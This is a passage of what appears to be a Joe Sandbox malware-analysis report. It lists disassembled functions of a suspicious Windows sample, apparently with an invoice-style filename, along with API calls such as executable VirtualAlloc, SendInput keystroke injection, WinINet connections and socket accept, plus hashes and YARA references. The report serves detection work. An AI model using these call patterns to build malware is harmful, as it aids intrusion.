                            • Instruction ID: 004dd27d7dbb60e659d938d335e71b63076de9736b684bc104292df8b9001610
                            • Opcode Fuzzy Hash: 2fc678c6bb235ef2624939dc26f4a9e0e1e1cb1d53284e15b2818ac6c563380b
                            • Instruction Fuzzy Hash: EBA1057070010ADBEB14EF65E9816BEBBB1FF45310F64416AEC86C3A91EB3498B0D742
                            Function 000E0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 000E0D85
                            • CharLowerBuffW.USER32(?,?), ref: 000E0DC8
                              • Part of subcall function 000E0458: CharLowerBuffW.USER32(?,?,?,?), ref: 000E0478
                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 000E0FB2
                            • _memmove.LIBCMT ref: 000E0FC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharLower$AllocVirtual_memmove
                            • String ID:
                            • API String ID: 3659485706-0
                            • Opcode ID: 59bb1c071401bf379b0f43e7b845851067a7ac552d71c4307f33567c8eb34af4
                            • Instruction ID: a04c47ed6b4deffea44708a4c179747527f993fab9b4afec419cfbe481eb7346
                            • Opcode Fuzzy Hash: 59bb1c071401bf379b0f43e7b845851067a7ac552d71c4307f33567c8eb34af4
                            • Instruction Fuzzy Hash: 6DB18C716043418FC754DF29C8809AAB7E4FF89714F14886EF889AB352DB71ED85CB82
                            Function 000DAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 000DAF56
                            • CoUninitialize.OLE32 ref: 000DAF61
                              • Part of subcall function 000C1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C10B8
                            • VariantInit.OLEAUT32(?), ref: 000DAF6C
                            • VariantClear.OLEAUT32(?), ref: 000DB23F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 780911581-0
                            • Opcode ID: 200610de22cc4a1d3ec0df10e1fb888b91e84e3e832f9d208dc0fd3cdc03550c
                            • Instruction ID: fe626f357031c7efba9aa2aade393cb31ae51e4372e6ade88c11f99834ec6a99
                            • Opcode Fuzzy Hash: 200610de22cc4a1d3ec0df10e1fb888b91e84e3e832f9d208dc0fd3cdc03550c
                            • Instruction Fuzzy Hash: 53A13735604701DFDB10EF14C891B6AB7E4BF89360F05845AF999AB3A2CB30ED40CB92
                            Function 0008C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                            Download Yara Rule
                            APIs
                            • _memmove.LIBCMT ref: 0008C419
                            • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,000C6653,?,?,00000000), ref: 0008C495
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FileRead_memmove
                            • String ID:
                            • API String ID: 1325644223-0
                            • Opcode ID: 9a3700058d9c4b66219e3841c028cc7e6a9817b5086f129a6c95bcaa9d4fd31b
                            • Instruction ID: 9c8fde417b50556995f6026ece28dfa624abedd1c04d8d9eb1ca43970323f7a0
                            • Opcode Fuzzy Hash: 9a3700058d9c4b66219e3841c028cc7e6a9817b5086f129a6c95bcaa9d4fd31b
                            • Instruction Fuzzy Hash: 6BA1D070A04609EBEB10EF65D884BBEFBB0FF05300F14C195E8959B685D731D9A1DBA1
                            Function 000A42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                            • String ID:
                            • API String ID: 3877424927-0
                            • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                            • Instruction ID: 742f4de80f9166cefb68e4de78b7fca446d2443d5a1e1a02cc57be1b352c283f
                            • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                            • Instruction Fuzzy Hash: 0A51C439A00305DBDF248FE988806AE77E5AFC6360F248729F875962D1D7F09E519B40
                            Function 000EC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(00A27288,?), ref: 000EC354
                            • ScreenToClient.USER32(?,00000002), ref: 000EC384
                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 000EC3EA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID:
                            • API String ID: 3880355969-0
                            • Opcode ID: d73d01f02e222dd6e6af7959556e8f69ebbc6ed95b6251a14c38b05be49a08ca
                            • Instruction ID: 3790e372c12493df9539d7de3dc9d6ea9b8ffeef6e4d8a0f07cea194b691d193
                            • Opcode Fuzzy Hash: d73d01f02e222dd6e6af7959556e8f69ebbc6ed95b6251a14c38b05be49a08ca
                            • Instruction Fuzzy Hash: 13518E74900245EFDF10DF69C880EAE7BF6FB45320F108159F865AB291D7719D82CB90
                            Function 000BD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000BD258
                            • __itow.LIBCMT ref: 000BD292
                              • Part of subcall function 000BD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000BD549
                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 000BD2FB
                            • __itow.LIBCMT ref: 000BD350
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            • API String ID: 3379773720-0
                            • Opcode ID: fb891171fa2c949e62d404a6b7440ad38a525ba901eb8bc9a9d22eb2296fe6a1
                            • Instruction ID: df0c4cd60f8b84176e392f2162d4db328d107e5e37306addff1815794e03f905
                            • Opcode Fuzzy Hash: fb891171fa2c949e62d404a6b7440ad38a525ba901eb8bc9a9d22eb2296fe6a1
                            • Instruction Fuzzy Hash: A6418671A002096BDF11EF54C842FEEBBF9AF59B00F000026FA45A3293EB759A45CB51
                            Function 000CEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000CEF32
                            • GetLastError.KERNEL32(?,00000000), ref: 000CEF58
                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000CEF7D
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000CEFA9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: f09ed040a4d7d242abd75dbc8f6cadb4e7c988660f72a298f3a2982539bb82ba
                            • Instruction ID: 8c7b5964c1c66b7040660adb7974c2f9afe3d484a9ead3999b05b0138d6c26f1
                            • Opcode Fuzzy Hash: f09ed040a4d7d242abd75dbc8f6cadb4e7c988660f72a298f3a2982539bb82ba
                            • Instruction Fuzzy Hash: 0D41153A600611DFCB15EF15C545A8DBBE5BF89320B19C098E88AAF362CB70FD41DB91
                            Function 000EB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000EB3E1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID:
                            • API String ID: 634782764-0
                            • Opcode ID: 742f80398a117021bd81444b14c862cc1edbd8c1cc1289cb4fb8f3c94f5ca727
                            • Instruction ID: dd4ee45a021ca25c9fd7b928df80cbb2ac42869cd3a68ffc7f0a1ecb391e69a0
                            • Opcode Fuzzy Hash: 742f80398a117021bd81444b14c862cc1edbd8c1cc1289cb4fb8f3c94f5ca727
                            • Instruction Fuzzy Hash: 5D31E4B4600284FFEF749E6ADC85FAE37A5EB06350F208112FA51F65E2C770D9809B51
                            Function 000ED5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                            Download Yara Rule
                            APIs
                            • ClientToScreen.USER32(?,?), ref: 000ED617
                            • GetWindowRect.USER32(?,?), ref: 000ED68D
                            • PtInRect.USER32(?,?,000EEB2C), ref: 000ED69D
                            • MessageBeep.USER32(00000000), ref: 000ED70E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID:
                            • API String ID: 1352109105-0
                            • Opcode ID: e680d25f46044b089a00ab5db6c0c9f2aed42fe77dc917eda39f5e4e4c83d6fb
                            • Instruction ID: f9b61f79344634a5592a1d586921182444fbaf387631259c2a62a2918bedbfbf
                            • Opcode Fuzzy Hash: e680d25f46044b089a00ab5db6c0c9f2aed42fe77dc917eda39f5e4e4c83d6fb
                            • Instruction Fuzzy Hash: 72418D34600159EFCB11DF9AE884BA97BF6FB45300F1441ABE859EB261E730E981CB40
                            Function 000C4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 000C44EE
                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 000C450A
                            • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 000C456A
                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 000C45C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: 0af7a49c0becca4dcf485bfb283b19e754aa8c5223eb3e66b3c8c07f60553693
                            • Instruction ID: 702fbb5b95b172506e2f4eb47d14b51bedd2012ffb4a32b17b9eebb038f3690e
                            • Opcode Fuzzy Hash: 0af7a49c0becca4dcf485bfb283b19e754aa8c5223eb3e66b3c8c07f60553693
                            • Instruction Fuzzy Hash: 8A311271A10A58AFEF309B649828FFE7BF5BB49310F04021EF481522D3CB748A45D761
                            Function 000B4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000B4DE8
                            • __isleadbyte_l.LIBCMT ref: 000B4E16
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B4E44
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B4E7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 350de839e88b16d2f7e8d8eec78a4607d6558efa8a4c1d815f7f843c778f58c2
                            • Instruction ID: bcbd14844144595fc0eb88431741af30b42864a48467393de43be8b80d6d40d0
                            • Opcode Fuzzy Hash: 350de839e88b16d2f7e8d8eec78a4607d6558efa8a4c1d815f7f843c778f58c2
                            • Instruction Fuzzy Hash: A931AF31600256AFDF219F74C845BFA7BE6FF41314F158528E8718B1A2E730DA91DB90
                            Function 000E7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 000E7AB6
                              • Part of subcall function 000C69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 000C69E3
                              • Part of subcall function 000C69C9: GetCurrentThreadId.KERNEL32 ref: 000C69EA
                              • Part of subcall function 000C69C9: AttachThreadInput.USER32(00000000,?,000C8127), ref: 000C69F1
                            • GetCaretPos.USER32(?), ref: 000E7AC7
                            • ClientToScreen.USER32(00000000,?), ref: 000E7B00
                            • GetForegroundWindow.USER32 ref: 000E7B06
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            • Opcode ID: 9af44667ff2f93f214a46a2df8efed749c567b0b941cdb3423524859d84b223a
                            • Instruction ID: 7e15fd548f7812c3b75907796758929371e3d01a534f102cd9a3c716f7a8f31b
                            • Opcode Fuzzy Hash: 9af44667ff2f93f214a46a2df8efed749c567b0b941cdb3423524859d84b223a
                            • Instruction Fuzzy Hash: 58312F71D00108AFCB10EFB5DC859EFBBFDEF58314B11806AE855E3212D6359E058BA0
                            Function 000EEFA8 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • GetCursorPos.USER32(?), ref: 000EEFE2
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000FF3C3,?,?,?,?,?), ref: 000EEFF7
                            • GetCursorPos.USER32(?), ref: 000EF041
                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000FF3C3,?,?,?), ref: 000EF077
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                            • String ID:
                            • API String ID: 2864067406-0
                            • Opcode ID: 860659a934f0bb40b6b6bbea3cb9ee0eb6df039b675b0da8206b83a4db750fa6
                            • Instruction ID: aa1be2550111479396e451b281fdbfb77d6d6b2b99af7985338752310d1396dc
                            • Opcode Fuzzy Hash: 860659a934f0bb40b6b6bbea3cb9ee0eb6df039b675b0da8206b83a4db750fa6
                            • Instruction Fuzzy Hash: C321EF35600058BFCB258F95DC98EFA7BF5EB4A710F044069F905A76A2C3319DA1DBA0
                            Function 000D497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D49B7
                              • Part of subcall function 000D4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4A60
                              • Part of subcall function 000D4A41: InternetCloseHandle.WININET(00000000), ref: 000D4AFD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Internet$CloseConnectHandleOpen
                            • String ID:
                            • API String ID: 1463438336-0
                            • Opcode ID: 06f8d57b7fb71654709729866119daf127adf5a38f1562b1277a174dd0ee6f97
                            • Instruction ID: ba866b27a036c16eec44417e08b7179123b13991beb71d0384001063319824e2
                            • Opcode Fuzzy Hash: 06f8d57b7fb71654709729866119daf127adf5a38f1562b1277a174dd0ee6f97
                            • Instruction Fuzzy Hash: 0321CF31240B05BFDB129FA49C05FBBBBA9FB48711F10401BFA4596751EBB1D810ABB5
                            Function 000E8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowLongW.USER32(?,000000EC), ref: 000E88A3
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000E88BD
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000E88CB
                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000E88D9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Long$AttributesLayered
                            • String ID:
                            • API String ID: 2169480361-0
                            • Opcode ID: b312d874175c1aa962df0f5c5226a4900a8394af368a99aed7b20f1aea12bf5b
                            • Instruction ID: 87dfa9e09f86d1f92ace2157f459f98478f6ad9f7c604d03f521bb80cf667ccc
                            • Opcode Fuzzy Hash: b312d874175c1aa962df0f5c5226a4900a8394af368a99aed7b20f1aea12bf5b
                            • Instruction Fuzzy Hash: D7117C31205514AFDB14AB69DC45FAA7BADBF85320F148119F95AD72E2CFB0AC40CBA1
                            Function 000D900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                            Download Yara Rule
                            APIs
                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 000D906D
                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 000D907F
                            • accept.WSOCK32(00000000,00000000,00000000), ref: 000D908C
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D90A3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLastacceptselect
                            • String ID:
                            • API String ID: 385091864-0
                            • Opcode ID: 9c43e333e8a9c207b5c5aea526bd9cc31f8b7a758a21a2d10b819d965600f9c8
                            • Instruction ID: 1d39cc5d251dd6b1dbad17be5c9433db66d7e1ce783227c269f094ba53085d1c
                            • Opcode Fuzzy Hash: 9c43e333e8a9c207b5c5aea526bd9cc31f8b7a758a21a2d10b819d965600f9c8
                            • Instruction Fuzzy Hash: 79215471900224AFCB11DF69D885ADEBBFCEF49710F01816AF849D7291D6749A81CBA0
                            Function 000C18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000C2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,000C18FD,?,?,?,000C26BC,00000000,000000EF,00000119,?,?), ref: 000C2CB9
                              • Part of subcall function 000C2CAA: lstrcpyW.KERNEL32(00000000,?,?,000C18FD,?,?,?,000C26BC,00000000,000000EF,00000119,?,?,00000000), ref: 000C2CDF
                              • Part of subcall function 000C2CAA: lstrcmpiW.KERNEL32(00000000,?,000C18FD,?,?,?,000C26BC,00000000,000000EF,00000119,?,?), ref: 000C2D10
